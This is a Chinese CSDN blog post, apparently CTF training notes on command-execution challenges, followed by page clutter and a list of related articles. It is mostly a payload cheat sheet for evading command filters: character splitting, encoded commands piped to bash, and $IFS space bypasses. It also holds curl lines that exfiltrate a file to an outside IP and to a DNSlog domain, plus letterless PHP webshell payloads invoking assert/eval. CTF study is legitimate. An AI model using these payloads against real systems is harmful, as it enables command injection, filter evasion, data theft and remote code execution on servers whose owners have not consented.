8月6日CTF命令执行训练

最新推荐文章于 2024-01-26 11:57:03 发布
最新推荐文章于 2024-01-26 11:57:03 发布
阅读量1.7k 收藏 7
点赞数
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slc3315/article/details/107841621
版权
这篇博客详细介绍了CTF挑战中的命令执行训练,包括三个题目。第一题涉及Linux命令执行,重点是代码执行、正则匹配与Webshell构造;第二题是无回显的get传参,利用DNSlog工具;第三题需要绕过限制,通过编码技术解决。每个题目都包含具体步骤和难点解析,提供了payload实例。
摘要由CSDN通过智能技术生成

题记:
1.linux常用命令

ls                    //列明当前文件目录下内容
ls ../../../          //上翻三级目录,并列明内容
cat /flag             //打开flag文件
find / -name flag     //查找flag文件
rar x file1.rar       //解压rar包

2.过滤关键字

?name=readfile('/f'.'lag');
//readfile文件读取
?name=$a='lag';$b='/f';readfile($b.$a);
//有的题会过滤flag顺序

1.利用空字符
c''at /f""lag
cat /fl''ag
ca\t /fl\ag
ca$@t /fl\ag
ca$9t /fl\ag
2.字符串拼接
a=c;b=at;c=/flag;$a$b $c
3.花括号
花括号可以表示固定变量名
花括号可以表示两个数组的笛卡尔积
花括号笛卡尔积绕过
{c,c}{at,at} /flag
4.利用通配符绕过非命令字符串
cat /fl[0-z]g
cat /fla*
cat /fla?
5.编码
base64 -d		base64解码
xxd -r -p 		16进制编码转换成字符
$()			会将包裹的字符作为命令
echo "Y2F0IC9mbGFn"|base64 -d|bash
echo "636174202f666c6167" | xxd -r -p|bash
$(printf  "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67")
`printf  "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"`

3.命令逃逸
在这里插入图片描述
4.绕过空格

1.数据流重定向
>	将左边的命令结果输出到右边的文件中,会覆盖
>>	将左边的命令结果输出到右边的文件中,在最后一行追加
<	将右边的文件的内容传递给左边的命令
cat</flag
cat<>/flag

2.已经存在的字符
$IFS对应 内部字段分隔符
cat${IFS}/flag
cat$IFS$9/flag
cat$IFS/flag

3.利用花括号的命令执行
{cat,/flag}

5.无回显

1.数据外带
利用日志、监听端口
curl 118.25.14.40:4444/`cat /flag`

2.利用DNSlog						http://ceye.io/
curl http://`cat /flag`.4vts2m.ceye.io

6.动态执行+异构

1.无字母
$_="`{
  {
  {"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=eval($_POST['cl4y']);

$_="`{
  {
  {"^"?<>/";	$_ = '_GET'
${$_}[_]				$_GET[_]
${$_}[__]				$_GET[__]
${$_}[_](${$_}[__]);	$_GET[_]($_GET[__]);

2.无字母数字
${(~%A0%B8%BA%AB)}[_](${(~%A0%B8%BA%AB)}[__]);&_=assert&__&#
最低0.47元/天 解锁文章
陆小朝
关注
专栏目录
cmd命令跳舞代码_CTFweb命令注入
weixin_39649965的博客
11-21 4693
大佬总结的文章,本篇文章阅读时间大约30分钟。一 、基本原理命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。注入有很多种,并不仅仅只有SQL注入。比如:命令注入(CommandInjection)Eval注入(EvalInjection)客户端脚本攻击(ScriptInsertion)跨网站脚本攻击(CrossSiteScripting,XSS)...
cmd执行命令不等待返回值_从一道ctf目学到的绕过长度执行命令姿势
weixin_29384861的博客
12-28 730
0x01:linux中的 > 符号和 >> 符号1.通过>来创建文件>test.txtls2.通过>将命令执行的结果存入文件中echo "hello world">test但是通过>来将命令执行结果写入文件会覆盖掉文件原本的内容,如果我们想要在原本文件内容后面追加内容就要使用>>echo "aaa">testcat tes...
CTF目合集
最新发布
cgygsw的博客
01-26 2997
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
[CTF]命令执行无回显利用
cosmoslin的博客
02-21 8410
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
buuctf 4(php&Rce&escapeshellarg cmd组合漏洞)
weixin_63231007的博客
05-05 1604
[MRCTF2020]Ez_bypass 1 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &&
CTFHub-web(RCE)
qq_49502930的博客
12-08 1136
文章目录eval执行文件包含php://input eval执行 打开关卡 意思是判断cmd是否被设置,若cmd被赋值,则执行如下语句,否则就继续显示以上代码。 我们先在url后输入 ?cmd=system("ls"); 查看根目录 然后输入 ?cmd=system("ls /"); 返回上一级 flag很显眼然后输入 ?cmd=system("cat /文件名"); 得到flag 文件包含 我们打开关卡 有个shell按钮,我们点击 这里使用火狐Hacker插件发现里面有个ctfhub变量,我
CTF训练
qq_43679873的博客
01-11 1261
CTF训练
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4496
前言: 这道考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
php文件包含读源码,CTF PHP文件包含--session
weixin_30045711的博客
03-12 728
PHP文件包含 Session首先了解一下PHP文件包含漏洞----包含session利用条件:session文件路径已知,且其中内容部分可控。姿势:php的session文件的保存路径可以在phpinfo的session.save_path看到。常见的php-session存放位置:/var/lib/php/sess_PHPSESSID/var/lib/php/sess_PHPSESSID/tm...
219-6-3Google浏览器书签备份
qq_43046057的博客
06-03 3554
WAF 创建时间 2019-03-11 12:45:27 最后修改 2019-04-03 14:02:50>> 书签名称 链接 添加时间 WEB漏洞测试(二)——HTML注入 & XSS攻击 - CSDN博客 http://www.secsky.cn/216.html 2018-05-15 10:45:24 ModSecurity介绍 - CSDN博客...
Bugku CTF-web3 GET型传参
weixin_44023403的博客
04-17 2024
前言:最近开始接触bugku,感觉适合新人培养兴趣。自己在学习的时候写个笔记,督促自己多去学习和巩固知识。如果文章和代码有表述不当之处,还请大佬不吝赐教。 Bugku CTF-web2 GET型传参基础知识解 基础知识 HTTP的GET请求: 从指定的资源请求数据。 HTTP的GET请求方式: GET提交的数据会放在URL之后,以?分割URL和传输数据,参数之间以&相连,如和http://XXXX.com?name=test1(参数1)&id=123456(参数2)。 解 查看P
catflag-web-wp部分(填坑)
开心星人的博客
03-25 4869
目录web签到webshell命令执行之我在哪int命令执行《我的女友是机器人》变量覆盖_extract等于False文件包含strcmp什么?有后门命令执行之我是谁小矛盾命令执行之我在干什么 web签到 进入页面,一片空白,查看源码 webshell 源码,状态包什么都看了,没找到 啥都没了,猜猜应该是目录扫描 扫一下 webshe11.php是白板,查看源码得到 解码得到hacker 应该是一句话木马的密码 cat看一下,没有找着(可以直接用菜刀连) 查看根目录 有了 命令执行之我在哪
BUUCTF记录(3)
bmth666的博客
03-20 3344
web [SWPU2019]Web1 [ASIS 2019]Unicorn shop [ACTF2020 新生赛]Include [安洵杯 2019]easy_web [WesternCTF2018]shrine [ACTF2020 新生赛]Exec [GXYCTF2019]禁止套娃 方法一:array_flip()和array_rand() 方法二:array_reverse() 方法三:使用session [GXYCTF2019]BabySQli [CISCN 2019 初赛]Love Math
由[极客大挑战 2019]RCE ME总结disable_functions绕过
車鈊的博客
06-06 500
由[极客大挑战 2019]RCE ME总结disable_functions绕过 源代码 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){
CatFlag
qq_53229503的博客
01-31 1406
方向为Misc——GFSJ1208,难度偏简单 来源地址:攻防世界(https://adworld.xctf.org.cn/challenges/list)
ctf 命令执行总结
njqfb的博客
06-04 2876
命令执行绕过总结 linux系统查看文件命令 more 一页一页的显示文件内容 less 和more类似 head 只显示头几行 tail 只显示最后几行 nl 显示时还输出行号 tailf cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 od 以二进制的方式读取内容 vi 编辑文件 vim 编辑文件,是vi的升级版 sort 将以默认的方式将文本文件的第一列以ASCI
菜鸡摸鱼BUUCTF-GET传参
weixin_45734980的博客
04-06 669
[极客大挑战 2019]Havefun 目看一眼源代码先 源代码中的注释语句,$cat参数是由get方法传入的,内容是“cat=”后的内容。如果参数内容是"dog",则输出Syc{}的内容。 所以构造url:…/?cat=dog 得到flag。 ...
CTF夺旗赛-GET参数注入
qq_39687353的博客
05-09 1499
个人笔记仅供参考 1.首先确保kali攻击机和靶机在同一个网段,使用ifconfig查看靶机ip 2.使用nmap -sn -PE 192.168.80.1/24命令扫描出同网段靶机ip 3.使用nmap -sV 192.168.80.132 命令扫描靶机开放服务端口 4.由于扫描出来的端口服务并没有大端口开放,因此存在大端口漏洞几率不高,所以我们再探测80端口使用命令dirb http://192.168.80.132:80 发现存在admin/login目录,于是在浏览器打开网
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值